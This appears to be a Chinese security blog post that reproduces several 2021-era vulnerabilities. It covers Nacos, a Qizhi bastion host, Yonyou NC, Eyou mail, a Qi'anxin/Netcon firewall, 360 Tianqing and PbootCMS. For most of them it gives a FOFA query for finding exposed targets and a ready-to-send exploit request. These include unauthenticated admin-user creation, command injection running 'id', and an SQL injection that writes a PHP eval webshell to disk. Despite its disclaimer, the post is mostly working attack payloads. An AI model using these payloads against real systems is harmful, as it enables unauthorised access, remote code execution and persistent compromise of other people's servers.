Skip to content

Latest commit

 

History

History
305 lines (190 loc) · 9.54 KB

漏洞复现(主要是复现今年的漏洞).md

File metadata and controls

305 lines (190 loc) · 9.54 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

推文开头,先学习一下中华人民共和国网络安全法,大家要做一名合法的白帽子,不要搞事情。

https://www.cto.ac.cn/thread-106.htm

图片

图片

图片

本推文仅用于信息防御技术教学,切勿用于其他用途,有侵权或者存在危害性,请联系我进行删除。

这几天复现了几个漏洞,整理一下,公众号发一波

Alibaba Nacos 未授权访问漏洞

目前受影响的 Alibaba Nacos 版本:

Nacos <= 2.0.0-ALPHA.1

fofa 语法

title="nacos"

未授权信息泄露的 poc

http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=100

未授权创建用户

发送下面的数据包,添加账号密码都是 qwe 的用户

POST /nacos/v1/auth/users HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: close

username=qwe&password=qwe

回到未授权暴露账号密码的接口处,可以发现 qwe 用户添加成功

最后登录成功

齐治堡垒机任意用户登录

fofa 搜索

app="齐治科技-堡垒机"

poc

https://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

用友 NC 目录遍历漏洞

fofa 语法

app="用友-UFIDA-NC"

poc

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename

亿邮电子邮件系统存在远程命令执行漏洞

fofa 语法

app="亿邮电子邮件系统"

poc

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

type='|id||'

这里我是写的 xray 自定义 poc 跑的,方便复现

奇安信 NS-NGFW 网康防火墙 前台 RCE

fofa 搜索

网康下一代防火墙

poc

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

{
    "action": "SSLVPN_Resource", 
    "method": "deleteImage", 
    "data": [
        {
            "data": [
                "/var/www/html/d.txt;id > /var/www/html/1.txt"
            ]
        }
    ], 
    "type": "rpc", 
    "tid": 17
}

放包,执行 id 命令,并将结果输出到网站根目录下的 1.txt 中

然后访问根目录下的 1.txt 文件

http://x.x.x.x/1.txt

360 天擎_越权访问

fofa 语法

app="360天擎私有云杀毒管理V6.0系统"
app="360天擎终端安全管理系统"

poc

https://x.x.x.x/api/dbstat/gettablessize

天擎_前台 sql 注入

fofa

app="360天擎私有云杀毒管理V6.0系统"
app="360天擎终端安全管理系统"

poc

/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--

这里我是用 sqlmap 验证的

PbootCMS SQL 注入漏洞(CNVD-2021-26207)

fofa

app="PBOOTCMS"

这个是无意中逛 cnvd 看见的漏洞,并复现成功了

漏洞描述就告诉你注入点在哪了

本地环境搭建复现

数据库是 mysql

条件为假时,未查到任何数据

条件为真时,查询到数据

admin 超管账号存于 ay_user 表中

其中 admin 的十六进制值为 61646d696e

查看 ay_user 中 username=admin 的记录

1=select 1 from ay_user where username regexp 0x61646d696e

最后祝大家漏洞越挖越多

END

有问题随时私聊

微信号:jiangdaren000

(欢迎各位师傅加好友探讨)